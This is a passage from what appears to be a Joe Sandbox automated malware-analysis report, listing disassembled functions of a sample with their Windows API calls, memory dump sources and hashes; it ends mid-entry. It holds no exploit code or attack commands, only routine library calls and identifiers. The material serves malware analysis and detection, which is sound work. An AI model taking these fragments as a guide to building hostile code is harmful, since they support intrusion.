                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                          • Opcode ID: fa126287197aaab2f837d23aeb16a9e5ec79d9dd50bdf96f59f5559d03b535df
                                                                                                                                                                          • Instruction ID: 99eb85aed6fa2f772e3ed118de86589079c9e63142033b39d50dbd8a0dd0d0c5
                                                                                                                                                                          • Opcode Fuzzy Hash: fa126287197aaab2f837d23aeb16a9e5ec79d9dd50bdf96f59f5559d03b535df
                                                                                                                                                                          • Instruction Fuzzy Hash: 30110A33A402256F9B259F18DC9095A73D5EB84361B1A41A0FD15AB295DB30DE01E7D2
                                                                                                                                                                          Function 00B29215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 61744e8ef18977801b8cf9d8fe370c204a1a40c2d23fc57e1ec70b7f45b6785d
                                                                                                                                                                          • Instruction ID: ae0f4681771d54a44be9363f69de9c1e564b61ad379ac960a755b95e149537cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 61744e8ef18977801b8cf9d8fe370c204a1a40c2d23fc57e1ec70b7f45b6785d
                                                                                                                                                                          • Instruction Fuzzy Hash: 90015233910538EBCF16EBA8DC82ADEB7B5EF98750F0145A5E81EB7152DA34CD1486A0
                                                                                                                                                                          Function 00B4C479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B4B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B49813,00000001,00000364,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B4B177
                                                                                                                                                                          • _free.LIBCMT ref: 00B4C4E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 614378929-0
                                                                                                                                                                          • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                          • Instruction ID: d8601390803d997f578577ec2bfc5b2d0ef18cc20c21c20036901e4cfef0864c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                                                                                                                                          • Instruction Fuzzy Hash: 900122722003056BE3318E698881A6AFBE8EB85330F250A6DE18493281EB30AA05C724
                                                                                                                                                                          Function 00B4B136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B49813,00000001,00000364,?,00B43F73,00000050,?,00B61030,00000200), ref: 00B4B177
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: a97e50290349fde0262e5ff43a0228682ce987c8b6cafe6adbbaa06ee1aa3d83
                                                                                                                                                                          • Instruction ID: 308f3ea0936fbd9730e753bda2385fe21b3a69f7cf96e399090410d36c4de58c
                                                                                                                                                                          • Opcode Fuzzy Hash: a97e50290349fde0262e5ff43a0228682ce987c8b6cafe6adbbaa06ee1aa3d83
                                                                                                                                                                          • Instruction Fuzzy Hash: 45F0B43252512477DB255B35AC55F5F37C8EF41760B1881D1B908B7190CF30DB01A6E0
                                                                                                                                                                          Function 00B43C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B43C3F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 190572456-0
                                                                                                                                                                          • Opcode ID: 252597b46e0509695469af20991bceb8f9577c32e5a350ae497a9c2179c72b35
                                                                                                                                                                          • Instruction ID: 4fbb365423487686cb0183c006198cd0ac290d0648597bd4c9aa6aeccf456f92
                                                                                                                                                                          • Opcode Fuzzy Hash: 252597b46e0509695469af20991bceb8f9577c32e5a350ae497a9c2179c72b35
                                                                                                                                                                          • Instruction Fuzzy Hash: E9F0A0362003269F8F118EA8EC40A9A77E9EF01F617184164FA15E7191DB31EB20EBD0
                                                                                                                                                                          Function 00B48E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B4CA2C,00000000,?,00B46CBE,?,00000008,?,00B491E0,?,?,?), ref: 00B48E38
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                          • Opcode ID: c2e8a6a49f5c1ba357c6245c374093440fafecb7b24989e7ee3f3d37518d5342
                                                                                                                                                                          • Instruction ID: b565698e4941e1603c0c48449f7661e0c6519121e72e7170314f2433f0b57b18
                                                                                                                                                                          • Opcode Fuzzy Hash: c2e8a6a49f5c1ba357c6245c374093440fafecb7b24989e7ee3f3d37518d5342
                                                                                                                                                                          • Instruction Fuzzy Hash: 5CE06D3128622567EA7227659C05B9F76C8DF41BA8F1501E1BC19AB191DF21CF00B2E2
                                                                                                                                                                          Function 00B25ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog.LIBCMT ref: 00B25AC2
                                                                                                                                                                            • Part of subcall function 00B2B505: __EH_prolog.LIBCMT ref: 00B2B50A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                                                          • Opcode ID: 93e87b01a51f35e54bd602975f168dbd1a64e0dd4fd591acd1a7d4e68f8f6a97
                                                                                                                                                                          • Instruction ID: 44bdceda68c8934b5841e53691154f1ab7ba7cd7264f0b73efaaf4041300b412
                                                                                                                                                                          • Opcode Fuzzy Hash: 93e87b01a51f35e54bd602975f168dbd1a64e0dd4fd591acd1a7d4e68f8f6a97
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E018130521690DAD725F7B8C0627DEF7E4DF64304F6044CDA45A53282CBB41B08DBA2
                                                                                                                                                                          Function 00B2A56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00B2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6C4
                                                                                                                                                                            • Part of subcall function 00B2A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6F2
                                                                                                                                                                            • Part of subcall function 00B2A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00B2A592,000000FF,?,?), ref: 00B2A6FE
                                                                                                                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00B2A598
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Find$FileFirst$CloseErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1464966427-0
                                                                                                                                                                          • Opcode ID: 6ee0be0e1b47caed15258d275f8be4b0db50d9cc9ef90aa57c77234d0075489a
                                                                                                                                                                          • Instruction ID: 0de41dc4c37dff6a48cca5d8d213c035a42a846eb54a28c9c3a46669d0daeb9d
                                                                                                                                                                          • Opcode Fuzzy Hash: 6ee0be0e1b47caed15258d275f8be4b0db50d9cc9ef90aa57c77234d0075489a
                                                                                                                                                                          • Instruction Fuzzy Hash: 16F082310087A0ABCB2257B4A904BCBBBD16F2A371F048B89F1FD52196C77550959B33
                                                                                                                                                                          Function 00B30E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00B30E3D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExecutionStateThread
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2211380416-0
                                                                                                                                                                          • Opcode ID: 0a70d6be93de2fafdae749e500a7556b3b7b51445c2c47eada198bf493c8445c
                                                                                                                                                                          • Instruction ID: f3b1bd2e717766865927e2069b8d2951462464311bbeec38907803045dec3057
                                                                                                                                                                          • Opcode Fuzzy Hash: 0a70d6be93de2fafdae749e500a7556b3b7b51445c2c47eada198bf493c8445c
                                                                                                                                                                          • Instruction Fuzzy Hash: 38D0C211B1516416DE11332C28257FE36CACFC6311F1C08E5F249572C3DE480882A262
                                                                                                                                                                          Function 00B3A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 00B3A62C
                                                                                                                                                                            • Part of subcall function 00B3A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B3A3DA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1915507550-0
                                                                                                                                                                          • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                          • Instruction ID: d25e9c763294ef7eb2572150dd713ce9881bd9ee3ee00651d7a24dccfb17fe44
                                                                                                                                                                          • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BD0C971254209BADF426F618C5396EBAD9EB01340F3481A6B8C2D5191EEB1ED10A666
                                                                                                                                                                          Function 00B3E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • DloadProtectSection.DELAYIMP ref: 00B3E5E3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DloadProtectSection
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2203082970-0
                                                                                                                                                                          • Opcode ID: 63fc39dc0d87cf5250f4167c80cade5ad621bb9ad7718b824c675d58dee3e249
                                                                                                                                                                          • Instruction ID: 18a5f4c080747afcd8db7795df2287063c0c5ea9c2db7e2d5caf266b1603bfd9
                                                                                                                                                                          • Opcode Fuzzy Hash: 63fc39dc0d87cf5250f4167c80cade5ad621bb9ad7718b824c675d58dee3e249
                                                                                                                                                                          • Instruction Fuzzy Hash: 27D0C9B4581280DBD612EBADD88679432D8F364705FF009C3B1659A4F1DF64D492CB05
                                                                                                                                                                          Function 00B3DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B31B3E), ref: 00B3DD92
                                                                                                                                                                            • Part of subcall function 00B3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B3B579
                                                                                                                                                                            • Part of subcall function 00B3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B3B58A
                                                                                                                                                                            • Part of subcall function 00B3B568: IsDialogMessageW.USER32(0001046A,?), ref: 00B3B59E
                                                                                                                                                                            • Part of subcall function 00B3B568: TranslateMessage.USER32(?), ref: 00B3B5AC
                                                                                                                                                                            • Part of subcall function 00B3B568: DispatchMessageW.USER32(?), ref: 00B3B5B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 897784432-0
                                                                                                                                                                          • Opcode ID: 2b0ec5e77576b738f141845ec5853fbff5e354026624aa73ff97673184898925
                                                                                                                                                                          • Instruction ID: 8e508b4904fa74025be3047fcd8c5daf67d3edd69dc811ba1fe2cf484383456b
                                                                                                                                                                          • Opcode Fuzzy Hash: 2b0ec5e77576b738f141845ec5853fbff5e354026624aa73ff97673184898925
                                                                                                                                                                          • Instruction Fuzzy Hash: A8D09E31154300BAD6013B51CD06F0B7AE2AB98F04F104594B384750F18AB29D61DB12
                                                                                                                                                                          Function 00B298BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileType.KERNELBASE(000000FF,00B297BE), ref: 00B298C8
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileType
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3081899298-0
                                                                                                                                                                          • Opcode ID: e76b45f62c9b6ede2fcd7aae465b460eb933fb2d599f1d09ba0c1df30b294a06
                                                                                                                                                                          • Instruction ID: 11a9568fac19479db9f4ca52ea91e0d65c827f4e5106cd39ad3d183d982aa8f4
                                                                                                                                                                          • Opcode Fuzzy Hash: e76b45f62c9b6ede2fcd7aae465b460eb933fb2d599f1d09ba0c1df30b294a06
                                                                                                                                                                          • Instruction Fuzzy Hash: 50C01234400215868E248A34A84809973A2EA53BF6BBC87D4C03C8E0E1C322CC87EA21
                                                                                                                                                                          Function 00B3E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B3E1E3
                                                                                                                                                                            • Part of subcall function 00B3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B3E8D0
                                                                                                                                                                            • Part of subcall function 00B3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B3E8E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1679167304.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1679146465.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679202560.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B65000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679225534.0000000000B82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1679306317.0000000000B83000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_b20000_updIMdPUj8.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID:
